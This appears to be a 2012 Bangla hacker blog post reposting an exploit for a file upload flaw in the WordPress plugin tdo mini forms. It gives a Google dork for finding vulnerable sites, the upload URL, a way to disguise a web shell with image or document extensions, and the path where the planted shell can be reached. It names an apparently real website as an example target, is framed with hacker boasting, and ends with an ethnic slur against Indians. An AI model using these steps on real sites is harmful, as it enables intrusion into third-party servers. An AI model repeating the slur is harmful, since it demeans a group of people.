Every Hacker is dangerous though he/she is a small or big hacker. Because all hackers have his/her own style. So honor them. If you don't honor then you will must lose the game...Ha Ha Ha...This is really a charm game I like. I honor all hackers who know the tricks to defeat the rules and rules of your life..

শুক্রবার, ২৪ ফেব্রুয়ারি, ২০১২

Wordpress Plugin Comment tdo mini forms <= Remote File Upload

Another common hackie tech from jrh

# Exploit Title: Wordpress Plugin Comment tdo mini forms <= Remote File Upload
# Author: Ev!LsCr!pT_Dz


Google dork: inurl:”plugins/tdo-mini-forms/tdomf-upload-inline.php?tdomf_form_id=1?"


# p0c :Tested by me works and give you example site...check that
  
 
# http://localhost/wp/wp-content/plugins/tdo-mini-forms/tdomf-upload-inline.php?tdomf_form_id=1
 
# Upload Your shell With : .txt .doc .pdf .jpg .gif .zip .mpg .avi .mov .mpeg .flv .ppt .pps .png .docx .rtf .rar .mp3 .wav .wmv .mp4...etc

# Now You can Find Your Shell In This Path :
 
# http://localhost/wp/wp-content/uploads/tdomf/tmp/1/192.168.1.1/up.php.jpg

# Change The Local IP To Your Adresse ip

==> Example :    192.168.1.1 ====> To ====> 199.16.155.16  <====

#################################################################################



Example site: http://www.yahee.info/wp-content/plugins/tdo-mini-forms/tdomf-upload-inline.php?tdomf_form_id=1

F**k indian

কোন মন্তব্য নেই:

একটি মন্তব্য পোস্ট করুন